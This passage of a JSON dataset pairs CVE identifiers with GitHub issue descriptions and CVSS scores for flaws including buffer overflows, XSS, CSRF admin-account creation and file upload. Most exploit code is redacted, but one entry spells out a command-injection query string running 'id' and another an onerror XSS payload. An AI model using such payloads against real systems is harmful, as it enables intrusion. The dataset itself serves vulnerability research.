  33501. "exploitabilityScore": 3.9
  33502. },
  33503. {
  33504. "CVE_ID": "CVE-2019-1010039",
  33505. "Issue_Url_old": "https://github.com/AKuHAK/uLaunchELF/issues/14",
  33506. "Issue_Url_new": "https://github.com/ps2homebrew/wlaunchelf/issues/14",
  33507. "Repo_new": "ps2homebrew/wlaunchelf",
  33508. "Issue_Created_At": "2018-03-02T03:07:08Z",
  33509. "description": "Buffer overflow in loader.c. There is a buffer overflow vulnerability in the loader.c file. This is in regards to both the s variable and the partition variable. The partition variable contains APITAG which is user controlled as displayed below: URLTAG This variable has a size of NUMBERTAG characters, making it simple to overflow: URLTAG Running with APITAG NUMBERTAG A's) will make the application crash. This weakness may be used to change the intended execution flow of the program.",
  33510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33511. "severity": "CRITICAL",
  33512. "baseScore": 9.8,
  33513. "impactScore": 5.9,
  33514. "exploitabilityScore": 3.9
  33515. },
  33516. {
  33517. "CVE_ID": "CVE-2019-1010043",
  33518. "Issue_Url_old": "https://github.com/ec-/Quake3e/issues/9",
  33519. "Issue_Url_new": "https://github.com/ec-/quake3e/issues/9",
  33520. "Repo_new": "ec-/quake3e",
  33521. "Issue_Created_At": "2018-03-04T11:45:39Z",
  33522. "description": "Buffer overflow in cmd.c. A buffer overflow scenario can be created within cmd.c. The APITAG variable within the APITAG function is vulnerable to this attack. The APITAG variable assigns all the arguments within argv to a single variable, space delimited. URLTAG This variable has allotted NUMBERTAG bytes for characters as displayed below: URLTAG If we provide arguments with length NUMBERTAG this variable should overflow and cause a crash.",
  33523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33524. "severity": "CRITICAL",
  33525. "baseScore": 9.8,
  33526. "impactScore": 5.9,
  33527. "exploitabilityScore": 3.9
  33528. },
  33529. {
  33530. "CVE_ID": "CVE-2019-1010044",
  33531. "Issue_Url_old": "https://github.com/archivesunleashed/borg-reducer/issues/4",
  33532. "Issue_Url_new": "https://github.com/archivesunleashed/graphpass/issues/4",
  33533. "Repo_new": "archivesunleashed/graphpass",
  33534. "Issue_Created_At": "2018-03-04T11:59:36Z",
  33535. "description": "Buffer overflow in borg reducer. A buffer overflow scenario can be created within borg reducer. The dir and filepath variables within the APITAG function are vulnerable to this attack. The output variable is set without any bounds at: URLTAG This is then later used in the APITAG function: URLTAG Both of the above mentioned variables are of size NUMBERTAG If we make output have a length NUMBERTAG a buffer overflow scenario will be produced and cause a crash.",
  33536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33537. "severity": "CRITICAL",
  33538. "baseScore": 9.8,
  33539. "impactScore": 5.9,
  33540. "exploitabilityScore": 3.9
  33541. },
  33542. {
  33543. "CVE_ID": "CVE-2019-1010057",
  33544. "Issue_Url_old": "https://github.com/phaag/nfdump/issues/104",
  33545. "Issue_Url_new": "https://github.com/phaag/nfdump/issues/104",
  33546. "Repo_new": "phaag/nfdump",
  33547. "Issue_Created_At": "2018-03-17T16:18:29Z",
  33548. "description": "Multiple security vulnerabilities in minilzo.c, nffile_inline.c and nfx.c. Summary nfdump (commit APITAG is affected by multiple security vulnerabilities in: bin/minilzo.c bin/nffile_inline.c bin/nfx.c For obvious security reasons, I voluntarily omitted to mention the affected lines of codes, so the developers should have enough time to fix these issues. The program's author has been contacted with the necessary technical details. Description By crafting special malformed nfcapd input files, an attacker can crash the program by forcing it to dereference invalid memory addresses, and _may_ overflow heap chunks to get arbitrary code execution. Feel free to contact me if more information are necessary.",
  33549. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33550. "severity": "HIGH",
  33551. "baseScore": 7.8,
  33552. "impactScore": 5.9,
  33553. "exploitabilityScore": 1.8
  33554. },
  33555. {
  33556. "CVE_ID": "CVE-2019-1010062",
  33557. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/44",
  33558. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/44",
  33559. "Repo_new": "pluck-cms/pluck",
  33560. "Issue_Created_At": "2017-04-11T17:52:00Z",
  33561. "description": "FILETAG Please fix it ASAP and contact me to get more details(i did not find you email) : My email: EMAILTAG",
  33562. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33563. "severity": "CRITICAL",
  33564. "baseScore": 9.8,
  33565. "impactScore": 5.9,
  33566. "exploitabilityScore": 3.9
  33567. },
  33568. {
  33569. "CVE_ID": "CVE-2019-1010091",
  33570. "Issue_Url_old": "https://github.com/tinymce/tinymce/issues/4394",
  33571. "Issue_Url_new": "https://github.com/tinymce/tinymce/issues/4394",
  33572. "Repo_new": "tinymce/tinymce",
  33573. "Issue_Created_At": "2018-05-15T09:17:48Z",
  33574. "description": "Cross site Scripting (XSS) issue in media element. I would like to request a security bug What is the current behavior? Tinymce is prone to inappropriate validation of user input in process of media element creation. Below I described APITAG which shows a way to execute arbitrary APITAG code self XSS. Steps to reproduce: (It can be tested at: URLTAG or URLTAG however this vulnerability behaves slightly different between those sites NUMBERTAG Click Insert > Media NUMBERTAG Type \"a\" in source and change active tab to embed APITAG NUMBERTAG Edit generated by tinymce code by adding \"onerror=alert NUMBERTAG APITAG NUMBERTAG Create media element APITAG What is the expected behavior? After few APITAG executions NUMBERTAG times) media element becomes properly sanitised. Moreover : After XSS executes, any try of editing malicious media element makes editor unresponsive for the user. FILETAG Which versions of APITAG and which browser / OS are affected by this issue? Did this work in previous versions of APITAG Affected version: _at least NUMBERTAG Tested Browsers: Chrome, Firefox OS: APITAG High Sierra",
  33575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33576. "severity": "MEDIUM",
  33577. "baseScore": 6.1,
  33578. "impactScore": 2.7,
  33579. "exploitabilityScore": 2.8
  33580. },
  33581. {
  33582. "CVE_ID": "CVE-2019-1010094",
  33583. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/65",
  33584. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/65",
  33585. "Repo_new": "domainmod/domainmod",
  33586. "Issue_Created_At": "2018-05-29T07:53:33Z",
  33587. "description": "There are three CSRF vulnerabilities that can add an administrator account, change a read only user to admin, or change the admin password. After the administrator has logged in, open the following three pages. change password: FILETAG ERRORTAG add the administrator account add a read only user FILETAG ERRORTAG change the read only user to admin FILETAG ERRORTAG",
  33588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33589. "severity": "HIGH",
  33590. "baseScore": 8.8,
  33591. "impactScore": 5.9,
  33592. "exploitabilityScore": 2.8
  33593. },
  33594. {
  33595. "CVE_ID": "CVE-2019-1010127",
  33596. "Issue_Url_old": "https://github.com/vcftools/vcftools/issues/141",
  33597. "Issue_Url_new": "https://github.com/vcftools/vcftools/issues/141",
  33598. "Repo_new": "vcftools/vcftools",
  33599. "Issue_Created_At": "2019-07-29T20:59:10Z",
  33600. "description": "CVETAG , CVETAG . Two CVEs, CVETAG CVETAG and CVETAG CVETAG have been created for vcftools. I believe NUMBERTAG to be a duplicate of NUMBERTAG Based on the stack trace provided here URLTAG , this is a very similar issue to CVETAG , discussed in URLTAG I believe that the following commits address the issue in NUMBERTAG URLTAG URLTAG URLTAG URLTAG",
  33601. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33602. "severity": "HIGH",
  33603. "baseScore": 7.8,
  33604. "impactScore": 5.9,
  33605. "exploitabilityScore": 1.8
  33606. },
  33607. {
  33608. "CVE_ID": "CVE-2019-1010161",
  33609. "Issue_Url_old": "https://github.com/DCIT/perl-Crypt-JWT/issues/3",
  33610. "Issue_Url_new": "https://github.com/dcit/perl-crypt-jwt/issues/3",
  33611. "Repo_new": "dcit/perl-crypt-jwt",
  33612. "Issue_Created_At": "2016-04-26T22:54:21Z",
  33613. "description": "APITAG should not require a key?. If I have the following JWT: APITAG \u2026 and I put that into FILETAG it parses into something useful. I don\u2019t see anything in this module that does this \u2026 am I missing something? APITAG has the same issue.)",
  33614. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33615. "severity": "CRITICAL",
  33616. "baseScore": 9.8,
  33617. "impactScore": 5.9,
  33618. "exploitabilityScore": 3.9
  33619. },
  33620. {
  33621. "CVE_ID": "CVE-2019-1010176",
  33622. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2476",
  33623. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2476",
  33624. "Repo_new": "jerryscript-project/jerryscript",
  33625. "Issue_Created_At": "2018-08-16T15:19:04Z",
  33626. "description": "Heap buffer overflow in lit_char_to_utf8_bytes. Version: APITAG Build command: CODETAG Testcase: APITAG Where testcase is as following: APITAG ( APITAG in hex). Stack trace: ERRORTAG",
  33627. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33628. "severity": "CRITICAL",
  33629. "baseScore": 9.8,
  33630. "impactScore": 5.9,
  33631. "exploitabilityScore": 3.9
  33632. },
  33633. {
  33634. "CVE_ID": "CVE-2019-1010179",
  33635. "Issue_Url_old": "https://github.com/remko/phkp/issues/1",
  33636. "Issue_Url_new": "https://github.com/remko/phkp/issues/1",
  33637. "Repo_new": "remko/phkp",
  33638. "Issue_Created_At": "2018-07-18T13:45:41Z",
  33639. "description": "RCE: query string is not sanitized.. Hi, the http query string is not sanitized. An attacker could inject a command. Here is an example that gives out the id command: /pks/lookup?search= EMAILTAG ;id&op=get It is possible to place a shell, or open a reverse shell or exchange gpg keys or execute other commands",
  33640. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33641. "severity": "CRITICAL",
  33642. "baseScore": 9.8,
  33643. "impactScore": 5.9,
  33644. "exploitabilityScore": 3.9
  33645. },
  33646. {
  33647. "CVE_ID": "CVE-2019-1010193",
  33648. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/3",
  33649. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/3",
  33650. "Repo_new": "hisiphp/hisiphp",
  33651. "Issue_Created_At": "2018-09-26T08:05:37Z",
  33652. "description": "csrf and xss Vulnerability. XSS: FILETAG FILETAG FILETAG CSRF: poc: CODETAG When the super administrator accesses, a tyonghu management account will be added in the background.",
  33653. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33654. "severity": "MEDIUM",
  33655. "baseScore": 6.1,
  33656. "impactScore": 2.7,
  33657. "exploitabilityScore": 2.8
  33658. },
  33659. {
  33660. "CVE_ID": "CVE-2019-1010239",
  33661. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/315",
  33662. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/315",
  33663. "Repo_new": "davegamble/cjson",
  33664. "Issue_Created_At": "2018-12-12T01:37:53Z",
  33665. "description": "Segmentation Fault after calling APITAG Hello. I think i found a bug in cJSON NUMBERTAG I attached source code to replay this bug. I used below script to build this code file. And also I built cJSON library with address sanitizer option and m NUMBERTAG clang o bug.o c bug.c DCJSON_API_VISIBILITY DCJSON_EXPORT_SYMBOLS DENABLE_LOCALES m NUMBERTAG g std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden clang m NUMBERTAG g fsanitize=address std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden Wl, rpath,${libcjonlibrarypath} rdynamic lm o bug bug.o . APITAG FILETAG",
  33666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33667. "severity": "HIGH",
  33668. "baseScore": 7.5,
  33669. "impactScore": 3.6,
  33670. "exploitabilityScore": 3.9
  33671. },
  33672. {
  33673. "CVE_ID": "CVE-2019-1010258",
  33674. "Issue_Url_old": "https://github.com/memononen/nanosvg/issues/136",
  33675. "Issue_Url_new": "https://github.com/memononen/nanosvg/issues/136",
  33676. "Repo_new": "memononen/nanosvg",
  33677. "Issue_Created_At": "2018-11-16T15:09:47Z",
  33678. "description": "Potential memory corruption bug in APITAG This simple Proof of Concept APITAG crashes nanosvg. In this snippet it is clear why this happens: ERRORTAG sscanf tries to parse the string, and writes arbitrary number of '%' or ' ' into the s1 or s2 buffer. The buffer overflows and triggers a segfault. This could lead to memory corruption and/or denial of service. Regards bitwave CC: MENTIONTAG for the fuzzing",
  33679. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33680. "severity": "MEDIUM",
  33681. "baseScore": 6.5,
  33682. "impactScore": 3.6,
  33683. "exploitabilityScore": 2.8
  33684. },
  33685. {
  33686. "CVE_ID": "CVE-2019-1010266",
  33687. "Issue_Url_old": "https://github.com/lodash/lodash/issues/3359",
  33688. "Issue_Url_new": "https://github.com/lodash/lodash/issues/3359",
  33689. "Repo_new": "lodash/lodash",
  33690. "Issue_Created_At": "2017-09-05T12:12:44Z",
  33691. "description": "Vulnerable Regular Expression. The following regular expression used in FILETAG is vulnerable to APITAG APITAG This regex is called by multiple methods exposed to the users such as APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  33692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  33693. "severity": "MEDIUM",
  33694. "baseScore": 6.5,
  33695. "impactScore": 3.6,
  33696. "exploitabilityScore": 2.8
  33697. },
  33698. {
  33699. "CVE_ID": "CVE-2019-1010299",
  33700. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/53566",
  33701. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/53566",
  33702. "Repo_new": "rust-lang/rust",
  33703. "Issue_Created_At": "2018-08-21T16:58:00Z",
  33704. "description": "APITAG has unsound Debug implementation. Found by APITAG The following code causes UB (not observable through crashes, but still): APITAG This will create a APITAG ring with capacity NUMBERTAG then turn that into a slice for Iter , and then print that entire slice. Run it in Miri URLTAG to see for yourself APITAG is in the \"tools\" menu).",
  33705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33706. "severity": "MEDIUM",
  33707. "baseScore": 5.3,
  33708. "impactScore": 1.4,
  33709. "exploitabilityScore": 3.9
  33710. },
  33711. {
  33712. "CVE_ID": "CVE-2019-1010300",
  33713. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/127",
  33714. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/127",
  33715. "Repo_new": "mz-automation/libiec61850",
  33716. "Issue_Created_At": "2019-02-25T13:26:26Z",
  33717. "description": "negative size param in server_example_ca.c. Hi team, There is a negative size param in APITAG APITAG NUMBERTAG ersion has this problem. Snip FILETAG ERRORTAG",
  33718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33719. "severity": "HIGH",
  33720. "baseScore": 7.5,
  33721. "impactScore": 3.6,
  33722. "exploitabilityScore": 3.9
  33723. },
  33724. {
  33725. "CVE_ID": "CVE-2019-1010304",
  33726. "Issue_Url_old": "https://github.com/mirumee/saleor/issues/3768",
  33727. "Issue_Url_new": "https://github.com/saleor/saleor/issues/3768",
  33728. "Repo_new": "saleor/saleor",
  33729. "Issue_Created_At": "2019-02-25T10:55:24Z",
  33730. "description": "Sensitive data exposed via Graphql. By default Saleor exposes sensitive business information like: APITAG { quantity: Int! APITAG Int! APITAG Money APITAG Int! margin: Int APITAG Int APITAG APITAG } I hope nobody is running Saleor out there with theses fields exposed to public.",
  33731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33732. "severity": "MEDIUM",
  33733. "baseScore": 5.3,
  33734. "impactScore": 1.4,
  33735. "exploitabilityScore": 3.9
  33736. },
  33737. {
  33738. "CVE_ID": "CVE-2019-1010305",
  33739. "Issue_Url_old": "https://github.com/kyz/libmspack/issues/27",
  33740. "Issue_Url_new": "https://github.com/kyz/libmspack/issues/27",
  33741. "Repo_new": "kyz/libmspack",
  33742. "Issue_Created_At": "2019-02-18T08:14:41Z",
  33743. "description": "Heap buffer overflow in APITAG Description: Function APITAG in libmspack has a heap buffer overflow problem( Out of Bound Read ). Affected version: libmspack NUMBERTAG alpha Details: In function APITAG , line NUMBERTAG APITAG will lead to out of bound read while extracting a crafted chm file. CODETAG Details with asan output: ERRORTAG poc file URLTAG Credit: APITAG of Venustech",
  33744. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  33745. "severity": "MEDIUM",
  33746. "baseScore": 5.5,
  33747. "impactScore": 3.6,
  33748. "exploitabilityScore": 1.8
  33749. },
  33750. {
  33751. "CVE_ID": "CVE-2019-1010315",
  33752. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/65",
  33753. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/65",
  33754. "Repo_new": "dbry/wavpack",
  33755. "Issue_Created_At": "2019-03-02T23:24:26Z",
  33756. "description": "Divide by zero in APITAG FILETAG Contains fuzzed input Running APITAG with APITAG extracted from the attachment triggers a SIGFPE due to divide by zero in APITAG URLTAG .",
  33757. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33758. "severity": "MEDIUM",
  33759. "baseScore": 5.5,
  33760. "impactScore": 3.6,
  33761. "exploitabilityScore": 1.8
  33762. },
  33763. {
  33764. "CVE_ID": "CVE-2019-1010316",
  33765. "Issue_Url_old": "https://github.com/leonnnn/pyxtrlock/issues/21",
  33766. "Issue_Url_new": "https://github.com/leonnnn/pyxtrlock/issues/21",
  33767. "Repo_new": "leonnnn/pyxtrlock",
  33768. "Issue_Created_At": "2019-02-26T12:01:19Z",
  33769. "description": "Padlock displayed but keyboard not blocked. Hi I have installed pyxtrlock in a fedora laptop, and, when executing it, the browser is displayed with the padlock and i cant do anything on it, great... But, if i hit any keyboard shortcut, or if i hit the activity bar with the mouse, i can still use the computer as normal. It looks like it only blocks the interaction of the keyboard with the browser Am i doing something wrong? Is there any config i need to apply? Thanks",
  33770. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  33771. "severity": "HIGH",
  33772. "baseScore": 7.8,
  33773. "impactScore": 5.9,
  33774. "exploitabilityScore": 1.8
  33775. },
  33776. {
  33777. "CVE_ID": "CVE-2019-1010317",
  33778. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/66",
  33779. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/66",
  33780. "Repo_new": "dbry/wavpack",
  33781. "Issue_Created_At": "2019-03-04T19:43:30Z",
  33782. "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit caff.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
  33783. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33784. "severity": "MEDIUM",
  33785. "baseScore": 5.5,
  33786. "impactScore": 3.6,
  33787. "exploitabilityScore": 1.8
  33788. },
  33789. {
  33790. "CVE_ID": "CVE-2019-1010319",
  33791. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/68",
  33792. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/68",
  33793. "Repo_new": "dbry/wavpack",
  33794. "Issue_Created_At": "2019-03-05T18:54:19Z",
  33795. "description": "Uninitialized Read (and Divide by Zero) in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit divzero waveheader.wav leads to a read of an uninitialized location in memory. The uninitialized read sometimes further leads to a divide by zero error. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG . This sometimes leads to a subsequent divide by zero on this line URLTAG I guess the division instruction may or may not be executed based on what value is read for APITAG .",
  33796. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33797. "severity": "MEDIUM",
  33798. "baseScore": 5.5,
  33799. "impactScore": 3.6,
  33800. "exploitabilityScore": 1.8
  33801. },
  33802. {
  33803. "CVE_ID": "CVE-2019-10181",
  33804. "Issue_Url_old": "https://github.com/AdoptOpenJDK/IcedTea-Web/issues/327",
  33805. "Issue_Url_new": "https://github.com/adoptopenjdk/icedtea-web/issues/327",
  33806. "Repo_new": "adoptopenjdk/icedtea-web",
  33807. "Issue_Created_At": "2019-07-22T11:46:06Z",
  33808. "description": "upcoming security release NUMBERTAG Three security issues were found in ITW, and have been discussed and are going to be fixed. Those are CVETAG CVETAG CVETAG Unembargo date was set to NUMBERTAG That day I will make PR for itw NUMBERTAG and head.",
  33809. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33810. "severity": "HIGH",
  33811. "baseScore": 8.1,
  33812. "impactScore": 5.9,
  33813. "exploitabilityScore": 2.2
  33814. },
  33815. {
  33816. "CVE_ID": "CVE-2019-10217",
  33817. "Issue_Url_old": "https://github.com/ansible/ansible/issues/56269",
  33818. "Issue_Url_new": "https://github.com/ansible/ansible/issues/56269",
  33819. "Repo_new": "ansible/ansible",
  33820. "Issue_Created_At": "2019-05-09T14:08:26Z",
  33821. "description": "gcp_storage_object fails with service_account_contents option. SUMMARY When I use APITAG option, the module call fails. When adding a debug task with APITAG the json content is properly displayed. ISSUE TYPE Bug Report COMPONENT NAME gcp_storage_object.py ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT N/A STEPS TO REPRODUCE yaml name: Trigger gitlab upload of gitlab secrets file gcp_storage_object: action: upload bucket: \"{{ gitlab_backup_gcs_name }}\" src: PATHTAG dest: \"{{ APITAG }}_gitlab APITAG auth_kind: \"serviceaccount\" service_account_contents: \"{{ lookup('file', gitlab_sa_key_path) }}\" EXPECTED RESULTS File uploaded ACTUAL RESULTS ERRORTAG",
  33822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  33823. "severity": "MEDIUM",
  33824. "baseScore": 6.5,
  33825. "impactScore": 3.6,
  33826. "exploitabilityScore": 2.8
  33827. },
  33828. {
  33829. "CVE_ID": "CVE-2019-10249",
  33830. "Issue_Url_old": "https://github.com/eclipse/xtext-xtend/issues/759",
  33831. "Issue_Url_new": "https://github.com/eclipse/xtext-xtend/issues/759",
  33832. "Repo_new": "eclipse/xtext-xtend",
  33833. "Issue_Created_At": "2019-03-26T15:43:58Z",
  33834. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG Original Report CVETAG This was originally responsibly disclosed privately, but I was asked to make it public by MENTIONTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. 
Again, this assumes that the build is fully reproducible and will require significantly more work.",
  33835. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33836. "severity": "HIGH",
  33837. "baseScore": 8.1,
  33838. "impactScore": 5.9,
  33839. "exploitabilityScore": 2.2
  33840. },
  33841. {
  33842. "CVE_ID": "CVE-2019-10262",
  33843. "Issue_Url_old": "https://github.com/8test/pentest/issues/2",
  33844. "Issue_Url_new": "https://github.com/8test/pentest/issues/2",
  33845. "Repo_new": "8test/pentest",
  33846. "Issue_Created_At": "2019-03-25T15:09:53Z",
  33847. "description": "SQL injection NUMBERTAG for Bluecms. FILETAG",
  33848. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33849. "severity": "CRITICAL",
  33850. "baseScore": 9.8,
  33851. "impactScore": 5.9,
  33852. "exploitabilityScore": 3.9
  33853. },
  33854. {
  33855. "CVE_ID": "CVE-2019-10276",
  33856. "Issue_Url_old": "https://github.com/cobub/razor/issues/168",
  33857. "Issue_Url_new": "https://github.com/cobub/razor/issues/168",
  33858. "Repo_new": "cobub/razor",
  33859. "Issue_Created_At": "2019-03-29T05:14:23Z",
  33860. "description": "Vulnerability: Cobub Razor file upload. Vulnerability: Cobub Razor file upload Detail: PATHTAG Line NUMBERTAG Determine whether $_FILES is empty APITAG the document root directory+folder+name >upload file. File type is not restricted. ERRORTAG POC: Construct an upload POST\uff1a ERRORTAG Upload success: CODETAG FILETAG",
  33861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33862. "severity": "CRITICAL",
  33863. "baseScore": 9.8,
  33864. "impactScore": 5.9,
  33865. "exploitabilityScore": 3.9
  33866. },
  33867. {
  33868. "CVE_ID": "CVE-2019-10644",
  33869. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/3",
  33870. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/3",
  33871. "Repo_new": "hyyyp/hybbs2",
  33872. "Issue_Created_At": "2019-03-29T14:38:49Z",
  33873. "description": "CSRF vulnerability which can add the administrator account. When the administrator logged in, open the page with poc , it can add the administrator account. Here, my test site's url is FILETAG . poc: html code below: CODETAG FILETAG",
  33874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33875. "severity": "HIGH",
  33876. "baseScore": 8.8,
  33877. "impactScore": 5.9,
  33878. "exploitabilityScore": 2.8
  33879. },
  33880. {
  33881. "CVE_ID": "CVE-2019-10646",
  33882. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/682",
  33883. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/682",
  33884. "Repo_new": "wolfcms/wolfcms",
  33885. "Issue_Created_At": "2019-03-27T13:44:43Z",
  33886. "description": "Cross Site Scripting | APITAG NUMBERTAG Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. APITAG URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add the snippet NUMBERTAG Insert payload (malicious APITAG APITAG OR APITAG in Name text box APITAG NUMBERTAG Payload will be saved and malicious APITAG will be executed wherever affected snippet is loaded APITAG Best Regards, Pramod Rana URLTAG varchashva [at] gmail [dot] com",
  33887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33888. "severity": "MEDIUM",
  33889. "baseScore": 6.1,
  33890. "impactScore": 2.7,
  33891. "exploitabilityScore": 2.8
  33892. },
  33893. {
  33894. "CVE_ID": "CVE-2019-10649",
  33895. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1533",
  33896. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1533",
  33897. "Repo_new": "imagemagick/imagemagick",
  33898. "Issue_Created_At": "2019-03-28T15:41:27Z",
  33899. "description": "memory leak in APITAG of coders/svg.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak vulnerability in function APITAG of coders/svg.c. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
